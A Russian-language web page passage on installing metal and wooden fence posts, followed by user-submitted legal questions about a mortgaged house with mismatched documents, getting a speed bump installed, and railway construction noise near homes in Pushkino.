  •  Монтаж с гравийной или щебневой засыпкой. Вкапывают аналогичным способом, что и вышеописанный. Яму наполняют каменистым материалом. За счет щебня или гравия достигается упрочнение конструкции. Расстояние между столбами забора следует выбирать среднее или минимальное от расчетного.

  •  Установка в бетон. Бетонирование позволяет существенно упрочнить конструкцию ограждения. Диаметр ямы под столб выбирают исходя из прочности грунта. Смонтированные таким способом, опоры позволяют нести высокие перпендикулярные и поперечные нагрузки. Метод подойдет для строительства высоких ограждений, заборов из профнастила с повышенной толщиной металла, для секций с увеличенным расстоянием между опорами. По технологии, наполнитель профлист ставят только по истечению 28 после заливки столба раствором. Это время полного твердения бетона.

  •  Арматурная установка в ленточный фундамент. Является самой прочной и чаще используется, если межсекционное расстояние ограждения будет больше 3 метров. Суть заключается в дополнительном приваривании металлических уголков к нижней части заборного столба, выполняющих армирующую функцию. Монтаж делают в траншею. Для обеспечения высокой надежности дополнительно производится бетонирование основания.

Установка деревянных столбов для забора

Опорные деревянные столбики в строительстве ограждений, эксплуатируемых на постоянной основе, используются реже. Это обусловлено недолговечностью конструкции, деформацией, гниением, рассыханием и прочими негативными факторами.

Правила установки следующие:

  • Использовать лучше дерево стабильных и стойких к гниению пород — ясень, ольха, дуб, акация.
  • В качестве стоек подойдет брус или оцилиндрованное бревно.
  • Для горизонтальных лаг можно взять брус, обрезную доску или горбыль. Брус обеспечивает более декоративный, эстетичный вид.
  • Для опор: диаметр бревна 100-150 мм, сечение бруса – 100х100 мм или больше.
  • Количество горизонтальных перемычек – две или три.
  • Для перемычек: сечение 40х40 мм, 40х60 мм, 60х60 мм.
  • Расстояние между столбами забора – от 2 до 3 метров. Оптимально – 2,5 метра.
  • Глубина вкапывания – от 1,2 метра.

Перед монтажом следует также учитывать некоторые технические нюансы, а именно:

  •  Деревянные стойки следует обработать противогрибковым средством со свойством влагозащиты высокого класса (трудновымываемые).

  •  Опоры устанавливаются на песчаную подушку. Она способствует лучшему прохождению воды ниже в грунт, чем предотвращает гниение дерева.

  •  Укрепить и повысить долговечность поможет бетонирование ямы.

  •  В процессе эксплуатации деревянные элементы следует регулярно обрабатывать антисептиками, обновлять лакокрасочный слой, если он предусмотрен.

Юридическая консультация онлайн

Проблемы с документами на недвижимость (частный дом)

Нужно Ваше мнение и консультация по вопросу.

В 2023 году мы с мужем купили дом, сделку вело агентство недвижимости и банк, т.к. оформлялась ипотека. Сделка прошла удачно, банк одобрил, дом купили. Вложили материнский капитал и муж подписал у нотариуса обязательство о выделение долей после окончания ипотеки, есть залоговые документы в банке дом.

В 2023 году семьёй собираемся переезжать в другой регион. Сначала там купили недвижимость, как только состоялась сделка, мы вернулись по месту жительства и выставили дом купленный в 2023 г на продажу, через агентство. И вот тут то и началось… Т.к. уже прошло 5 лет как мы владели домом, соответственно тех паспорт старый. Агентство вызывает БТИ, приезжает специалист и начинает задавать вопросы, а где окно, оно тут было, где дверной проем, он тут был, эта новая постройка, это помещение т.к. в нем стоит твердотопливный котел, уже считается теплым помещением. В итоге площадь в 54 кв.м. увеличивается до 65 кв.м и куча переделок. Мы никаких ремонтов и перестроений не делали как купили, так и жили.

Получилось, что сделку в 2023 г нам оформили по старому тех паспорту, т.к. срок 5 лет у них на момент сделки не прошел. Перестроение никто не оформлял естественно. А оценка недвижимости была липовая. Т.к. оценщик по факту и не выезжал на объект, в документе написано «Фактическая планировка соответствует планировке по техническому паспорту БТИ», а она на момент сделки уже давно как не соответствовала.

Сделку готовили и под ипотечников тоже, пришлось через дом клик обращаться в банк, чтобы они дали разрешение на перестроение, хоть мы ничего и не делали, но документы оформлять нам. Банковские работники округляют глаза и говорят: «А кто же вам одобрил ипотеку, если у вас такие проблемы с документами на дом?».

Я оформила (от руки) проект и рассчитала примерную смету. Банк рассмотрел, дал разрешение.

Мы собрались и уехали в другой регион, т.к. тянуть уже нельзя было с переездом. Оставили генеральную доверенность на свекровь. Агентство продолжило работу с документами.

Далее «агентство» идут в архитектурный отдел, посмотрев документы, отдел попросил замерить расстояние от фасада здания до забора. И оказалось, что это расстояние равно 2 м 54 см, а нужно по ГОСТу — 3 м, ответ архитектурного отдела. Делайте межевание иначе мы не поедем на ваш объект, т.к. нет смысла, земли не хватает. Межевание делать некуда, т.к. после забора идет уже дорога (грунтовая дорога, т.к. это частный сектор) , через дорогу большая канава заросшая деревьями и еще метров через 5 стоит соседний дом. Агентство разводит руками, бросает нашу недвижимость, со словами что это тупик.

1. Документы на дом у нас на руках (дом строил бывший хозяин самостоятельно в 1989 г, есть и проект и разрешение на строительство).

2. В дом вложен материнский капитал, плюс первоначальный взнос, 5 лет платили исправно ипотеку проценты, долг по ипотеки за это время уменьшился в 3 раза, огромная потеря денег. Срок ипотеки заканчивается в 2026 году, как выделять в нем доли?

3. И самое то главное, мы же его планировали продать! А теперь получается безвыходное положение. Дом стоит, в нем сейчас живет брат мужа с семьей, ухаживает за ним, т.к. между нами сейчас 5000 км и сами мы не можем ездить.

4. Агентство, которое вело сделку в 2023 году уже давно не существует, как мне сказала директор филиала Сбербанк: «Так они давно закрыли, на воровались и закрылись».

Вопрос к вам, юристы, что делать и как выходить из этой ситуации? Тупик? Или есть все таки варианты?

§

Куда и с чем обращаться для установки лежачего полицейского.

Куда обратиться и с какими бумажками для установки лежачего полицейского в населенном пункте.

Установку готов произвести полностью за свой счёт.

Могу взять любую бумажку от местной администрации, ходатайство, рекомендацию какую нибудь и тп, только скажите что лучше написать.

Так же, от гаи могу взять любую бумажку с ходатайством и тп бумажкой, так же надо знать что им написать.

Ситуация такая, догора регионального значения проходит через населенный пункт, дома находятся практически на дороге, расстояние с обоих сторон метров 15-20 до дома, а до преддомовой территории и еще меньше. Камер нет, скоростной режим постоянно нарушается, гаи здесь бывает крайне редко. Было много дтп включая и со смертельным исходом. На преддомовой территории детские площадки, был случай когда машина слетела и накрыла детей, слава богу все выжили, еще случаи бывали когда пьяные водители слетали на эти детские площадки, но там никого небыло, врезались в заборы и тп.

Школы рядом нет, есть дальше (там уже установлен лежачий).

Пешеходного перехода так же рядом нет. просто дорога и дома практически на дороге.

Вариант обратиться в местную администрацию не подходит, так как там очень пассивные управленцы.

Помогите написать куда надо и что надо, денег заплачу сколько нужно.

§

§

ЧТО нас ждёт, когда ЗАПУСТЯТ ДВИЖЕНИЕ ПО НОВОМУ ПУТИ?

Какие статьи закона я могу использовать?

Здравствуйте!

Я проживаю: МО, г. Пушкино, мкр. Мамонтовка, ул. Ленточка.

Последние 2 года под окнами моего дома ведётся строительство IV гл. пути Ярославской ж/д.

14.04.16 состоялась «горячая линия» с Президентом РФ В.В. Путиным, на которое я написала письмо, оставшееся без ответа.

Зато строительство ж/д шло ударными темпами, продолжая делать мою жизнь невыносимой: перед моим домом КРУГЛОСУТОЧНО грохочут пас-сажирские и грузовые поезда, проносятся электрички, ездят самосвалы, трактора, катки, кричат рабочие. Поездов и электричек порядка 350 в сутки, грузовых – меньше, зато по 60 вагонов каждый!

Всё это проходит: «в рамках реализации Актуализированной генеральной схемы развития Московского железнодорожного узла ОАО «РЖД» преду-смотренного строительством IV главного пути на участке Мытищи-Пушкино (2023 год)».

А КАК мне ЖИТЬ в таких условиях, там НЕ ПРЕДУСМОТРЕНО!

Через 2,5 месяца (29.06.2023), я написала письмо на имя Президента РФ и отправила на его личный сайт.

30.06.2023 г. получила извещение о том, что моё обращение переправлено в правительство МО и Минтранс РФ в целях объективного и всестороннего рассмотрения.

В течение месяца мне приходили ответы, не столько отражающие суть дела, сколько запутывающие сложившуюся ситуацию.

10.08.2023 г. я написала повторное письмо Президенту РФ, которое также было переправлено в Минтранс РФ и в Федеральную службу по надзору в сфере защиты прав потребителей и благополучия человека.

Прошло ЕЩЁ 1,5 МЕСЯЦА – я получаю либо ответы, либо отписки.

Никто даже не пытается ответить на мой вопрос – КАК МНЕ ЖИТЬ ДАЛЬШЕ под грохот и вибрации проезжающих поездов?! МОЙ ДОМ НАЧИНАЕТ ПОТИХОНЬКУ РАЗВАЛИВАТЬСЯ!

Как-то ночью я подскочила от грохота сорвавшейся со стены большой книжной полки – испугавшись, что дом стал рушиться.

Также мной было отправлено письмо с фото на интернет-сайт «Сердитый гражданин», где получила ответ от РЖД о том, что вся проектная документация и строительство ведётся СОГЛАСНО НОРМАТИВНЫМ ДОКУМЕНТАМ И ЗАКОНАМ РФ.

КАК ЖЕ был согласован проект, если в соответствии с «Действующими нормативными док-ми СанПиН 2.2.1/2.1.1.1200-03 для линий ж/д транспорта устанавливаются санитарные разрывы.

Согласно СНиП 2.07.01-89 – «Планировка и застройка городских и сельских поселений», Москва 2001 г., п. 6.8; «Нормы и правила проектирования отвода земель для ж/д» – ОСН 3.02.01-97, жилую застройку НЕОБХОДИМО отделять от ж/д санитарно-защитной зоной шириной 100 м, считая от оси крайнего ж/д пути.

В санитарно-защитной зоне, вне полосы отвода ж/д, ДОПУСКАЕТСЯ раз-мещать авто дороги, гаражи, стоянки автомобилей, склады, учреждения коммунально-бытового назначения. Не менее 50% площади санитарной зоны должно быть озеленено.

Мой дом НЕ ВХОДИТ в указанный перечень допустимых строений!

Более того, в настоящее время вдоль прокладываемого IV главного пути ж/д перегона Мытищи-Пушкино, возводится капитальный забор от ст. Пушкино до ст. Клязьма. Расстояние от забора до наших жилых участков – от 0,5 до 5 метров, что является ЕЩЁ ОДНИМ грубым нарушением вышеуказанных норм.

Ситуация осложняется ещё и тем, что с другой стороны моего участка рас-стояние от моей калитки до проезжей части легкового и грузового транспорта по ул. Ленточка составляет всего 3 шага.

Строительство 4-й ветки ж/д ведётся без выходных. Авто и ж/д транспорт движется с двух сторон моего дома круглосуточно. Грохот и вибрация от поездов, выхлопные газы от грузовиков и автомобилей продолжают ухудшать мою жизнь и здоровье.

Кроме меня на нечётной стороне ул. Ленточка стоит 35 домов, в каждом из которых проживает по 2-3 семьи.

ЧТО нас ждёт, когда ЗАПУСТЯТ ДВИЖЕНИЕ ПО НОВОМУ ПУТИ?

Похоже, что наши дома развалятся от тряски, а мы заработаем вибрационную болезнь и пропишемся в больнице!

Оцените статью
Дача-забор
Добавить комментарий